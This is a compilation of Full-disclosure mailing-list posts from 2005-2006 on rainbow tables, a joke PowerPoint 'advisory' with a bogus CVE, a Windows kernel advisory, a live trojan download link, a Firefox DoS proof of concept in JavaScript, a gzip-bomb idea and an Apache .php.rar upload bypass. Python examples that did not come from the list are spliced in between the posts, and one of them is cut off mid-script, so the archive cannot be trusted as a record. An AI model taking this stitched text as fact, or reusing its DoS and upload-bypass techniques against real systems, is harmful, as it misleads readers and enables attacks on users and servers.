> channels and other neat tricks, but the basic point remains - if you connect
> *to* the shell, you're no longer anonymous, and if you don't connect to the
> shell, you can't use the shell
>
>

Another issue to consider is that a mere user level shell likely lacks
privs to do some of the nasties referenced in some of these posts.  Thus,
the friend would not only have to allow shell access, but also give away
root on the server as well.

Just a minor point.

Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




[Full-disclosure] rainbowtables.schmoo.com dead?

2006-04-12 Thread Ron

Hello,

I found myself in a situation today where I needed to crack a Windows 
password.  I decided that, since I have enough room to store them now, 
I'd grab a table from http://rainbowtables.schmoo.com.  When I went 
there, I discovered, to my horror, that I was redirected to a search 
engine page.


Luckily, I managed to crack the passwords in a different way; they were 
like 5-character alphabetic.  But the problem remains, I'd like to get 
a good rainbow table.


Does anybody know another site where rainbow tables can be downloaded 
for free?  A quick Google search turned up nothing.  If nothing comes 
up, perhaps I'll generate my own tables, but I'd rather not spend months 
doing it.


Thanks,
Ron



[Full-disclosure] Advisory 2006-03-11 DoS Vulnerability in Microsoft PowerPoint

2006-03-12 Thread ron
Advisory 2006-03-11 DoS Vulnerability in Microsoft PowerPoint

I. BACKGROUND

Advisory marked for immediate release.

II. DESCRIPTION

Sending a specially crafted malformed packet to the services communication 
socket can create a loss of service.

III. HISTORY

This advisory has no history.

IV. WORKAROUND

There are no known workarounds.

V. VENDOR RESPONSE

Microsoft PowerPoint has not commented on this issue.

VI. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-925992 to this issue.

APPENDIX A. - Vendor Information
http://www.microsoft.com
APPENDIX B. - References
NONE

CONTACT:
*ron [EMAIL PROTECTED]
*1-888-LOL-WHAT
*CISSP GSAE CCE CEH CSFA GREM SSP-CNSA SSP-MPA GIPS GHTQ GWAS




[Full-disclosure] test

2006-01-11 Thread ron

checking if this address works on the list


Re: [Full-disclosure] happy new year.

2005-12-21 Thread Ron

teh kids wrote:

i suppose its about time i passed this on.

http://www.geocities.com/teh_kids/index.html 



it reminds me of the windoze 95 days, not seen _anything_ like this for 
a long long time.


In case anybody cares, this does NOT work on Windows 98 (ha!).

Also, in case you don't feel like checking, it can be used to crash 
users on:

- myspace
- smf
- invision power board

NOT affected:
- vBulletin


And, of course, anywhere else where html is allowed.

It's especially fun to change your friend's myspace page so he can't get 
to it to fix it.  Good times.. :)


Merry Christmas!


Re: [Full-disclosure] [EEYEB-20050523] Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability

2005-12-13 Thread Ron
Some versions of Nessus can log in through SSH and check the system 
locally.  I'm unsure if Retina can do that, but it wouldn't surprise me.


Joshua Russel wrote:

It is a local vulnerability, then how does Retina claim to scan it remotely?


On 12/13/05, Advisories <[EMAIL PROTECTED]> wrote:

Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability

Release Date:
December 13, 2005

Date Reported:
May 23, 2005

External References:
eEye ID# EEYEB-20050523
OSVDB ID# 18823
CVE # CAN-2005-2827
Microsoft #  MS05-055

Severity:
Medium (Local Privilege Escalation to Kernel)

Systems Affected:
Windows NT 4.0
Windows 2000

Overview:
eEye Digital Security has discovered a local privilege escalation
vulnerability in the Windows kernel that could allow any code executing
on a Windows NT 4.0 or Windows 2000 system to elevate itself to the
highest possible local privilege level (kernel).  For example, a
malicious user, network worm, or e-mail virus could take advantage of
this vulnerability in order to completely compromise the vulnerable
system on which the exploit code is executing, regardless of that code's
original privilege level.

The vulnerability exists in the thread termination routine contained
within NTOSKRNL.EXE.  Through a specific series of steps, a local
attacker can cause the code responsible for discarding queued
Asynchronous Procedure Call (APC) entries to erroneously attempt to free
a region of kernel data, producing a "data free" vulnerability that may
be exploited in order to alter arbitrary kernel memory, or even divert
the flow of execution directly.

Technical Details:
The basis of this vulnerability is in PspExitThread's APC freeing loop
and in the behavior of KiMoveApcState, invoked from KiAttachProcess and
KeUnstackDetachProcess.  We'll give a description of the problem below,
followed by a "call flow" illustration to outline the specific sequence
of events.

When a thread is exiting, PspExitThread will detach the thread's APC
queues from ETHREAD.ApcState.ApcListHead[0] and ApcListHead[1], so that
each queue is now a circular, doubly-linked list in which the first and
last nodes do not point back to the list head (LIST_ENTRY structure).
However, since the list heads' pointers are not modified, the purpose is
presumably just to allow the APC freeing loop within PspExitThread to
walk each list and free its nodes, without navigating back to the list
head and erroneously attempting to free memory within the ETHREAD
structure.  Of course, the vulnerability is that this can be made to
happen, and the result is a "data free" condition that eventually causes
ExFreePoolWithTag to operate on user memory.

APCs queued by an external process count against that process's pool
quota, and therefore the quota block of the pool block containing the
APC structure has a reference to the queuing process.  If the exiting
thread contains an APC queued by a now-terminated external process in
its lists, and if that APC node represents the last reference to the
process's Process object, then freeing that node will cause the Process
object to be destroyed from within ExFreePoolWithTag.  Part of this
sequence involves executing PspProcessDelete, which switches to the
ending process's address space using KeStackAttachProcess, calls
PspExitProcess, and then reverses the switch with
KeUnstackDetachProcess.

Both the "attach" and "detach" functions call KiMoveApcState, which is
intended to temporarily strip the thread of its APCs so that none are
dispatched in an address space for which they were not intended, then
re-link the list of APCs after the thread's native address space is
reinstated.  During attach, the ETHREAD.ApcState structure is
duplicated, and the pointers of the lists' first and last nodes are
adjusted to refer to the copy.  Upon detach, the first and last nodes'
pointers are adjusted to re-link the lists to the original
ETHREAD.ApcState -- even though they were supposed to remain
disconnected, since the APC free loop is still in progress.  The end
result is that the free loop will continue and attempt to free a portion
of the ETHREAD structure as though it were a pool block header,
culminating in the kernel operating on attacker-supplied pointers from
user-land memory, because the accessed portion of ETHREAD contains
predictable and mostly zeroed values.

The following depicts the sequence of function calls and parameters
involved in producing the vulnerable condition:

. PspExitThread
. . KeFlushQueueApc
. . (detaches APC queues from ETHREAD.ApcState.ApcListHead)
. . (APC free loop begins)
. . ExFreePool(1st_APC -- queued by exited_process)
. . . ExFreePoolWithTag(1st_APC)
. . . . ObfDereferenceObject(exited_process)
. . . . . ObpRemoveObjectRoutine
. . . . . . PspProcessDelete
. . . . . . . KeStackAttachProcess(exited_process)
. . . . . . . . KiAttachProcess
. . . . . . . . . KiMoveApcState(ETHREAD.ApcState --> duplicate)
. . . . . . . . . KiSwapProcess
. . . . . . . PspExitProcess(0)
. 

Re: [Full-disclosure] MSN Messanger Virus

2005-12-13 Thread Ron

Damnit, you posted that while I was cleaning up the results.

FWIW, here's my columnized version of virustotal.com's output:

Antivirus      Version         Update      Result
AntiVir        6.33.0.61       12.13.2005  TR/Dldr.Banload.ID.4
Avast          4.6.695.0       12.13.2005  no virus found
AVG            718             12.08.2005  no virus found
Avira          6.33.0.61       12.13.2005  TR/Dldr.Banload.ID.4
BitDefender    7.2             12.13.2005  GenPack:Trojan.Downloader.Banload.ID
CAT-QuickHeal  8.00            12.13.2005  TrojanDownloader.Banload.id
ClamAV         devel-20051108  12.12.2005  no virus found
DrWeb          4.33            12.13.2005  Trojan.DownLoader.5891
eTrust-Iris    7.1.194.0       12.13.2005  no virus found
eTrust-Vet     12.3.3.0        12.13.2005  no virus found
Fortinet       2.54.0.0        12.12.2005  W32/Banker.ID!dldr
F-Prot         3.16c           12.12.2005  no virus found
Ikarus         0.2.59.0        12.13.2005  no virus found
Kaspersky      4.0.2.24        12.13.2005  Trojan-Downloader.Win32.Banload.id
McAfee         4649            12.13.2005  PWS-Banker.dldr
NOD32v2        1.1320          12.12.2005  probably unknown NewHeur_PE virus
Norman         5.70.10         12.13.2005  no virus found
Panda          8.02.00         12.13.2005  Trj/Nabload.R
Sophos         4.00.0          12.13.2005  no virus found
Symantec       8.0             12.13.2005  no virus found
TheHacker      5.9.1.054       12.13.2005  no virus found
VBA32          3.10.5          12.13.2005  Trojan-Downloader.Win32.Banload.id


Bernardo Quintero wrote:

Look at the photos >>> http://hometown.aol.com.au/miralafoto/imagens001.exe

I've run a couple of virus scanners on this file with none of them being
able to figure out what it is.  Anyone have any clues?  Also, I'm having


http://www.virustotal.com

Scan results
File: imagens001.exe
Date: 12/13/2005 19:30:16 (CET)

AntiVir 6.33.0.61/20051213 found [TR/Dldr.Banload.ID.4]
Avast 4.6.695.0/20051213 found nothing
AVG 718/20051208 found nothing
Avira 6.33.0.61/20051213 found [TR/Dldr.Banload.ID.4]
BitDefender 7.2/20051213 found [GenPack:Trojan.Downloader.Banload.ID]
CAT-QuickHeal 8.00/20051213 found [TrojanDownloader.Banload.id]
ClamAV devel-20051108/20051212 found nothing
DrWeb  4.33/20051213 found [Trojan.DownLoader.5891]
eTrust-Iris 7.1.194.0/20051213 found nothing
eTrust-Vet 12.3.3.0/20051213 found nothing
Fortinet 2.54.0.0/20051212 found [W32/Banker.ID!dldr]
F-Prot 3.16c/20051212 found nothing
Ikarus 0.2.59.0/20051213 found nothing
Kaspersky 4.0.2.24/20051213 found [Trojan-Downloader.Win32.Banload.id]
McAfee 4649/20051213 found [PWS-Banker.dldr]
NOD32v2 1.1320/20051212 found [probably unknown NewHeur_PE virus]
Norman 5.70.10/20051213 found nothing
Panda 8.02.00/20051213 found [Trj/Nabload.R]
Sophos 4.00.0/20051213 found nothing
Symantec 8.0/20051213 found nothing
TheHacker 5.9.1.054/20051213 found nothing
VBA32 3.10.5/20051213 found [Trojan-Downloader.Win32.Banload.id]





Re: [Full-disclosure] Firefox 1.5 buffer overflow (poc) - more buffer "overflows" waiting to be discovered

2005-12-09 Thread Ron
If it's causing a Bluescreen, it's probably not a problem with Firefox. 
 It's looking like it IS a problem with the Windows API, as somebody 
else suggested.


Fósforo wrote:

It works here.

seems it depends on how much RAM you have. i got 2 blue screens after i
changed the code a bit. the first one was about MEMORY_MANAGEMENT and
the second one was a PAGE_FAULT_IN_NONPAGED_AREA. And both occur
without user interaction; for the second one i had just opened firefox, not
the bug file (maybe cache?)

ps: i have 1 GB of RAM

heh
function ex() {
    var buffer = "";
    for (var i = 0; i < 5000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    var buffer3 = buffer2;
    for (i = 0; i < 500; i++) {
        buffer2 += buffer;
        // the inner loop reuses i, so the outer loop ends after one pass
        for (i = 0; i < 500; i++) {
            buffer3 += buffer2;
        }
    }
    document.title = buffer2;
}
ZIPLOCK says CLICK ME




2006/1/31, ezdy <[EMAIL PROTECTED]>:

and there's no reason for it to be working.
first let's see what's going on - i loaded the provided html in firefox
and quit it.
even quitting firefox took a while, but only slightly longer than usual.
after starting firefox again, it indeed didn't load, stuck in some
kind of disk loop ignoring all macosx ui events.
but not swapping. alright, that's strange:

[EMAIL PROTECTED]:~/Desktop/Firefox.app/Contents/MacOS$ ktrace ./firefox-
bin
[EMAIL PROTECTED]:~/Desktop/Firefox.app/Contents/MacOS$ kdump -m 1 |
tail -100
...
  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
  7616 firefox-bin GIO   fd 24 read 4096 bytes
   "0"
  7616 firefox-bin RET   read 4096/0x1000
  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
  7616 firefox-bin GIO   fd 24 read 4096 bytes
   "0"
  7616 firefox-bin RET   read 4096/0x1000
  7616 firefox-bin CALL  lseek(0x18,0x21a000,0)
  7616 firefox-bin RET   lseek 0
  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
  7616 firefox-bin GIO   fd 24 read 4096 bytes
   "0"
  7616 firefox-bin RET   read 4096/0x1000
  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
  7616 firefox-bin GIO   fd 24 read 4096 bytes
   "\\"
  7616 firefox-bin RET   read 4096/0x1000
  7616 firefox-bin CALL  lseek(0x18,0x21c000,0)
  7616 firefox-bin RET   lseek 0
  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
  7616 firefox-bin GIO   fd 24 read 4096 bytes
   "A"
  7616 firefox-bin RET   read 4096/0x1000
  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)
  7616 firefox-bin GIO   fd 24 read 4096 bytes
   "A"
  7616 firefox-bin RET   read 4096/0x1000
  7616 firefox-bin CALL  lseek(0x18,0x21e000,0)
  7616 firefox-bin RET   lseek 0
  7616 firefox-bin CALL  read(0x18,0xcad9e00,0x1000)

this repeats virtually ad infinitum until the end of history.dat is reached.
note that no memory is ever allocated - the same buffer is always used,
thus no memory leak.
firefox is stuck in a loop (and eventually starts, since the string is
finite, in my case about 30M) but it took way too long to load. i'm not a
windows user but since mac is only a step away from it (you know apple,
let's take win95 and freebsd and mix it together) my guess is it is the
same situation of keeping the main thread busy so events cannot be passed
down, eventually leading to the "application is not responding" killbox.

for Z1PL0CK:
Don't stop, keep posting fake "buffer overflows" of #darknet
trademonkeys (this one actually looked funny in the beginning).
This time you made it to get /.ed which is not a bad start, but you
gonna fly higher!

Because this bug got killed, i've something better for you:
dd if=/dev/zero a 2GB file and gzip it. then just write a php script
which sets content-encoding: gzip and fpassthru the file. safari rendered
a 1.2gb system unresponsive in 5 seconds, firefox in about 30. both
crashed on "overflows" like this:

Safari(233,0xa000ed68) malloc: *** vm_allocate(size=125896)
failed (error code=3)
Safari(233,0xa000ed68) malloc: *** error: can't allocate region
Safari(233,0xa000ed68) malloc: *** set a breakpoint in szone_error to
debug

for those interested i can send coredumps

now THAT'S SOME SERIOUSLY MAD warez (for those who want to quickly
pollute the browser's heap with shellcode: yah, this is a good way).

sheesh. is this some 'who invents a stupider dos attack against
browser' contest of some sort or what?

On 8.12.2005, at 20:51, Matt wrote:


Didn't work here, just made the system go a bit sluggish for a
moment, as you would expect when dealing with a 2.5  million
character string.

Firefox :
Mozilla/5.0 (X11; U; Linux i686; en-US; rv: 1.8) Gecko/20051130
Firefox/1.5
Built with :
gcc version 3.4.4 (Gentoo 3.4.4-r1, ssp-3.4.4-1.0, pie-8.7.8)
Window manager:
KDE 3.5.0

Possibly it is crashing the Windows API ?

--
Matt


On 

Re: [Full-disclosure] re: Firefox 1.5 buffer overflow (poc)

2005-12-08 Thread Ron

I was also unable to replicate it, on Firefox 1.5 i386 Linux EN

[EMAIL PROTECTED] wrote:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

not a fake, nor do you really not know what a buffer overflow is, but for
sure here on my firefox 1.5 EN, the client takes much longer to load on
the next boot but it reloads fine without exceptions and there is
nothing about a security bug here...



which
most users won't figure out.

this proof of concept will only prevent someone from reopening
their browser after being exploited. DoS if you will. however, code
execution is possible with some modifications.

Tested with Firefox 1.5 on Windows XP SP2.

ZIPLOCK <[EMAIL PROTECTED]>

heh
function ex() {
    var buffer = "";
    for (var i = 0; i < 5000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 500; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
ZIPLOCK says CLICK ME






Re: [Full-disclosure] Bug with .php extension?

2005-12-05 Thread Ron

Simon Richter wrote:
> I would think this is related to "Options MultiViews", where a file
> generally has many suffixes (file type, language, compression, ...).
> Does this also happen to you (yes, I'm too lazy to try right now) if you
> turn MultiViews off?
>
> Nevertheless, good idea that script authors should possibly be aware
> that any suffix, not just the last, is interpreted.
>
>Simon

Thanks for the response,

That was a good idea, I hadn't thought of it; however, I turned off 
MultiViews, and it still behaves the same way.


I also tried adding more extensions, just out of curiosity.  The 
following files also run as .php files:

  http://www.javaop.com/~iago/test.php.cpp.java
  http://www.javaop.com/~iago/test.php.a.a.a.a.b.b.b.b.c.d.e.f

Interestingly, these files are NOT affected, and don't parse the .php:
  http://www.javaop.com/~iago/test.php.jpeg.bmp.rar
  http://www.javaop.com/~iago/test.php.jpeg.rar

The first of those two behaves as a .bmp, and the second one behaves as 
a .jpeg.


It seems that it uses the last recognized extension when parsing files, 
ignoring everything after it.


Any other ideas?  At this point, I'm unsure whether to call it a bug or 
a feature, and whether to alert Apache about it.  Unless somebody posts 
soon, I'll send a bug report to Apache.


Ron



[Full-disclosure] Bug with .php extension?

2005-12-04 Thread Ron
I'm not sure whether this is something that's well known, but I've never 
seen anything about it, and I nearly got burned by it, so I figured I'd 
post it here.


In Apache 1.3.33 (untested on any other version), if you have a file 
called file.php.bak, and you navigate to it in the browser, it will run 
on the server as a .php file.  This works with any extension that isn't 
known to the server (.rar, .bak, .test, .java, .cpp, .c, etc.)


This can impact upload scripts, if they don't rename.  I had a script 
that was only allowing a very limited number of file names, including 
.rar.  I realized that I could upload the file test.php.rar, as 
demonstrated here:

http://www.javaop.com/~iago/test.php.rar

(I assure you that that's a .php script, not just that text file).

Resolution: If any script does that, it should be changed such that it 
renames any files, perhaps to a SHA1() hash of the filename, or a 
timestamp, or anything like that.


This problem reminds me of a recent discussion about files like 
file.exe.txt in Windows.


In general, that's good advice anyways, you shouldn't allow any kind of 
user-specified filenames.  But just in case somebody is making this 
mistake, be careful!   As I said, I nearly got burnt by this; luckily I 
noticed it before anybody malicious did.


Ron
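An added example (mine, not code from Ron's post, Apache or PHP) covering both this post and the follow-up above where test.php.cpp.java still ran as PHP: an upload handler check that looks at every suffix of the submitted name rather than only the last one, beside the weak last-suffix check, and then stores the file under a server-chosen SHA1-plus-timestamp name as the Resolution suggests. The HANDLER_EXTENSIONS and ALLOWED_EXTENSIONS sets are constructed for the example, not Apache's configured list.

```python
import hashlib
import time
from typing import List, Optional

# Constructed allow-list: suffixes this upload handler will serve back as-is.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "txt", "rar"}

# Constructed list of suffixes a server-side handler would execute wherever
# they appear in the name (mod_mime looks at every dot-separated segment).
HANDLER_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "cgi", "pl", "shtml"}


def extensions_of(filename: str) -> List[str]:
    """Return every dot-separated segment after the first, lower-cased,
    e.g. 'test.php.rar' -> ['php', 'rar']. Directory parts are dropped."""
    name = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    parts = name.split(".")
    return [p.lower() for p in parts[1:] if p]


def last_extension_only_check(filename: str) -> bool:
    """The weak check the post's upload script effectively used: accept when
    the final suffix is on the allow-list. Kept only to show the gap."""
    exts = extensions_of(filename)
    return bool(exts) and exts[-1] in ALLOWED_EXTENSIONS


def is_dangerous_upload(filename: str) -> bool:
    """True when ANY suffix is one a handler would act on. This is the
    check the post's script lacked: 'test.php.rar' passes a last-suffix
    check, yet Apache 1.3 executes it as PHP."""
    return any(ext in HANDLER_EXTENSIONS for ext in extensions_of(filename))


def safe_storage_name(filename: str, now: Optional[float] = None) -> str:
    """Server-chosen name: sha1 of the submitted name plus a timestamp, with
    exactly one allow-listed suffix. Refuses anything a handler would run."""
    if is_dangerous_upload(filename):
        raise ValueError(f"refusing {filename!r}: executable suffix present")
    exts = extensions_of(filename)
    if not exts or exts[-1] not in ALLOWED_EXTENSIONS:
        raise ValueError(f"refusing {filename!r}: extension not allowed")
    stamp = int(now if now is not None else time.time())
    digest = hashlib.sha1(filename.encode("utf-8")).hexdigest()
    return f"{digest}-{stamp}.{exts[-1]}"


if __name__ == "__main__":
    for candidate in ("photo.jpeg", "test.php.rar", "test.php.cpp.java"):
        print(candidate, "weak check:", last_extension_only_check(candidate),
              "dangerous:", is_dangerous_upload(candidate))
```

The renamed file is the real fix; the suffix scan only explains which names the weak check lets through.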


[Full-disclosure] Hacking hoax...

2005-12-02 Thread Ron
I'm hosting a bit of a hoax this week (to celebrate December Fool's Day, 
not to be confused with April Fool's Day, which is real).


What I need is some log files that seem to indicate an attack.  I 
already posted some FTP brute-force-looking stuff, but it was pretty weak.


Anybody got some cool looking log files I can borrow?

Thanks!


Re: [Full-disclosure] PHC proudly presents ...

2005-11-26 Thread Ron
Calling someone else a kid 
just because he has a different mindset or vision is simply childish.


Am I the only one who sees a little bit of irony there?


Re: [Full-disclosure] [FLSA-2005:158801] Updated bzip2 packages fix security issues

2005-11-14 Thread Ron
I took about 2 minutes out of my life several months ago and created 
rules in Thunderbird which put all those update messages into a special 
folder that I ignore.  It wasn't incredibly hard to do, and now I'm 
happy AND I didn't have to complain on the list! Win-win!


Rembrandt wrote:

Could you please stop mailing your Bug-Fix-Reports aka "Package xyz
updated" to the Full*-Mailinglist?

I'm sure you've an OWN mailinglist for such things.
If not: Create one

Such things just suck and NERVE all others who don't use the OS/Distri.
It's not related to you personally and you're not the only one.

Kind regards,
Rembrandt




Re: [Full-disclosure] RE: Full-Disclosure Digest, Vol 9, Issue 3

2005-11-07 Thread Ron DuFresne
On Sat, 5 Nov 2005, Brian Dessent wrote:

> Robert Kim Wireless Internet Advisor wrote:
> >
> > Nick, hi... why would you want to filter out the digests? will this
> > eliminate digests from my subscriptioin?
>
> It would have nothing to do with *sending* the digests, and everything
> to do with stopping tards that hit reply to a 70kb digest containing 20
> messages, add a single word reply without trimming anything, and spew it
> all back to the list.  It also breaks threading when someone replies to
> a digest using a mail client that's too dumb to reply to individual
> mails in a digest.  Don't "security professionals" know how to use email
> for god's sake?

What makes you think that in this day and age, "security professionals" are no
more pigeonholed in skills than other IT professionals?  Limited tools in
daily use tend to deprecate those with skills over a broader spectrum at
an earlier point in time, let alone that CISSP is the only real
qualification for the claim.

Thanks,



Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




[Full-disclosure] Security Conference

2005-09-15 Thread Ron Bidule
Hi, 


For those of you that may be interested. I got this in my inbox.

hack.lu 2005

The purpose of the hack.lu convention is to give an open and free
playground where people can discuss the implication of new technologies
(mainly security) on society. hack.lu is a balanced convention where
technical and non-technical people can meet each other and share freely
all kinds of information. The convention will be held in the Grand-Duchy
of Luxembourg on Friday/Saturday 14-15 October 2005
(http://www.hack.lu/wiki/index.php/Map). The convention is open and free
to everyone.

Scope

Topics of interest include, but are not limited to:

    * Software Engineering
    * Honeypots/Honeynets
    * Electronic/Digital Privacy
    * Wireless Network and Security
    * Attacks on Information Systems and/or Digital Information Storage
    * Electronic Voting
    * Free Software and Security
    * Assessment of Computer, Electronic Devices and Information Systems
    * Standards for Information Security
    * Legal and Social Aspect of Information Security
    * Software Engineering and Security
    * Forensic Analysis

Agenda

A preview agenda is available including workshops and lectures -
http://www.hack.lu/wiki/index.php/Agenda

Registration

Registration is now open: http://www.hack.lu/wiki/index.php/RegistrationPage

As the hack.lu 2005 event is free, registration is optional but highly
recommended.

The first 100 users to register will receive a MISC magazine.

Capture The Flag Contest

A Capture The Flag Contest will be held on Saturday. If you want to
participate and propose a team, feel free to check the web page:
http://www.hack.lu/wiki/index.php/CaptureTheFlag



[Full-disclosure] Security Conference

2005-09-14 Thread Ron Bidule
For those of you that are interested in: hack.lu 2005

The purpose of the hack.lu convention is to give an open and free
playground where people can discuss the implication of new technologies
(mainly security) on society. hack.lu is a balanced convention where
technical and non-technical people can meet each other and share freely
all kinds of information. The convention will be held in the Grand-Duchy
of Luxembourg on Friday/Saturday 14-15 October 2005
(http://www.hack.lu/wiki/index.php/Map). The convention is open and free
to everyone.

Scope

Topics of interest include, but are not limited to:

    * Software Engineering
    * Honeypots/Honeynets
    * Electronic/Digital Privacy
    * Wireless Network and Security
    * Attacks on Information Systems and/or Digital Information Storage
    * Electronic Voting
    * Free Software and Security
    * Assessment of Computer, Electronic Devices and Information Systems
    * Standards for Information Security
    * Legal and Social Aspect of Information Security
    * Software Engineering and Security
    * Forensic Analysis

Agenda

A preview agenda is available including workshops and lectures -
http://www.hack.lu/wiki/index.php/Agenda

Registration

Registration is now open: http://www.hack.lu/wiki/index.php/RegistrationPage

As the hack.lu 2005 event is free, registration is optional but highly
recommended.

The first 100 users to register will receive a MISC magazine.

Capture The Flag Contest

A Capture The Flag Contest will be held on Saturday. If you want to
participate and propose a team, feel free to check the web page:
http://www.hack.lu/wiki/index.php/CaptureTheFlag
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Full-Disclosure Digest, Vol 7, Issue 25

2005-09-13 Thread Ron DuFresne
On Tue, 13 Sep 2005, Gary E. Miller wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Yo Eric!
>
> On Mon, 12 Sep 2005, [EMAIL PROTECTED] wrote:
>
> > What if I am otherhost?  Is there a facility for something like
> > [EMAIL PROTECTED] cat /dev/tcp/me/listen/5000 > yesterhost-hda.img
>
> I just spent some time with "man bash" and the bash source code and do
> not see how to do that.  I am sure they would take a patch.
>
> Maybe someone else has a bright idea on how to accept a tcp/udp
> connection with just bash, or some other universally installed
> unix binary.  A lot of systems do not have nc by default.
>

I believe this can be done with the real version of korn shell, not the
lightened version that is named pksh though for most linux dists.  But in
a discussion with a fellow admin here at work a few weeks ago it was shown
that the real korn shell can play tcp and udp very sweetly and simply in
scripts.  I have not the working example at hand here to demo for folks,
but, if needed can get it.  I'm sure the man page and/or the O'Reilly
manual documents this.

Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




Re: [Full-disclosure] Automated mass abuse of form mailers

2005-09-12 Thread Ron DuFresne
On Mon, 12 Sep 2005, n3td3v wrote:

> You're missing the point, as i've tried to outline. This is an active
> project, and written code for such an outbreak is already within the
> hands of  *underground hacker communities*.
>
> If you look at my background posts, as posted earlier on the threat,
> you'll see the lead up.
>



Perhaps, and perhaps you danced about mine and missed them as well.  9 of
10 websites use off-the-shelf free code, and most use dated code that was
never written with a mind towards security.  So if folks are going to use
tools in existence rather than create their own hammers and drills they
should go for other than perhaps the first click in a google search and
find something that was coded with security in mind, rather than the first
link that likely pops up in a google search.  If the code is good that
they incorporate into their designs, then it kinda devalues the current
tools that nasty boys are using, does it not?  If their tools
rely upon poorly written code, then replacing it with far better code
makes their efforts kinda nil, yes?

Thanks,

Ron DuFresne


> Thanks..
>
> On 9/12/05, Ron DuFresne <[EMAIL PROTECTED]> wrote:
> > On Mon, 12 Sep 2005, Michael Holzt wrote:
> >
> > > Automated mass abuse of form mailers
> > >
> >
> > [snip]
> >
> >
> >
> > Nothing new really, this has been an issue for many years now.  And often
>

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.




Re: [Full-disclosure] Automated mass abuse of form mailers

2005-09-12 Thread Ron DuFresne
On Mon, 12 Sep 2005, Michael Holzt wrote:

> Automated mass abuse of form mailers
>

[snip]



Nothing new really, this has been an issue for many years now.  And often
the result of folks still using Matt's CGI scripts, despite his references
and links to the more secure versions of his and other web based scripts
that can be gotten from:

http://nms-cgi.sourceforge.net/scripts.shtml


Unless one is careful they often get what they paid for

Thanks,


Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.



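A worked illustration of the abuse pattern this thread is about, added here and not taken from Matt's Script Archive or the NMS replacements: the classic form mailer takes the recipient and the header fields straight from the POST body, which is what lets a spammer drive it as a relay, and the hardened handler beside it pins the recipient server-side and rejects line terminators in any field that reaches the headers. The field names, the allowlist address and the two sample submissions are constructed for the example.

```python
"""Added example (not code from Matt's Script Archive or the NMS project):
the 'recipient and headers come from the form' pattern that lets a form
mailer be driven as an open spam relay, beside a hardened handler.
Field names, the allowlist and the sample submissions are assumptions."""
import re
from email.message import EmailMessage
from email.policy import SMTP

# Assumed: the only mailbox this form may ever deliver to.  The recipient
# is decided server-side; the client never gets to name one.
ALLOWED_RECIPIENTS = {"webmaster@example.org"}

# Header values are single-line.  CR, LF or NUL in a value lets the sender
# append headers of their own (Bcc:, a second To:) or terminate the header
# block early and start the body.
_HEADER_BAD = re.compile(r"[\r\n\x00]")


def build_message_vulnerable(form):
    """Formmail-style behaviour: trust 'recipient', 'email' and 'subject'
    straight from the POST body and splice them into raw header text."""
    headers = (
        f"To: {form['recipient']}\r\n"
        f"From: {form['email']}\r\n"
        f"Subject: {form['subject']}\r\n"
    )
    return headers + "\r\n" + form["message"]


class FormRejected(ValueError):
    """Raised for a submission the hardened handler refuses to send."""


def build_message_hardened(form, allowed=ALLOWED_RECIPIENTS):
    """Same inputs, but the recipient must be on the allowlist and every
    client-supplied header field is checked for line terminators before
    it is handed to the email library."""
    recipient = form.get("recipient", "")
    if recipient not in allowed:
        raise FormRejected("recipient is not on the server-side allowlist")
    for field in ("email", "subject"):
        if _HEADER_BAD.search(form.get(field, "")):
            raise FormRejected(f"control character in header field {field!r}")
    msg = EmailMessage(policy=SMTP)
    msg["To"] = recipient
    msg["From"] = "formmailer@example.org"      # fixed; never the visitor's address
    if form.get("email"):
        msg["Reply-To"] = form["email"]          # visitor's address goes here instead
    msg["Subject"] = form.get("subject", "")
    msg.set_content(form.get("message", ""))
    return msg


def accepts(form):
    """True if the hardened handler would send this submission."""
    try:
        build_message_hardened(form)
    except FormRejected:
        return False
    return True


def count_header(raw, name):
    """Number of '<name>:' lines in the header block of raw message text."""
    block = raw.split("\r\n\r\n", 1)[0]
    prefix = name.lower() + ":"
    return sum(1 for line in block.split("\r\n") if line.lower().startswith(prefix))


# Constructed submissions: a legitimate contact-form post and the kind of
# request an automated relay abuser sends.
LEGIT = {
    "recipient": "webmaster@example.org",
    "email": "visitor@example.com",
    "subject": "Broken link on the downloads page",
    "message": "The mirror link returns a 404.",
}
SPAM = {
    "recipient": "victim1@example.net,victim2@example.net",
    "email": "bounce@example.com\r\nBcc: victim3@example.net",
    "subject": "hello",
    "message": "unsolicited advertisement",
}

if __name__ == "__main__":
    print(build_message_vulnerable(SPAM))
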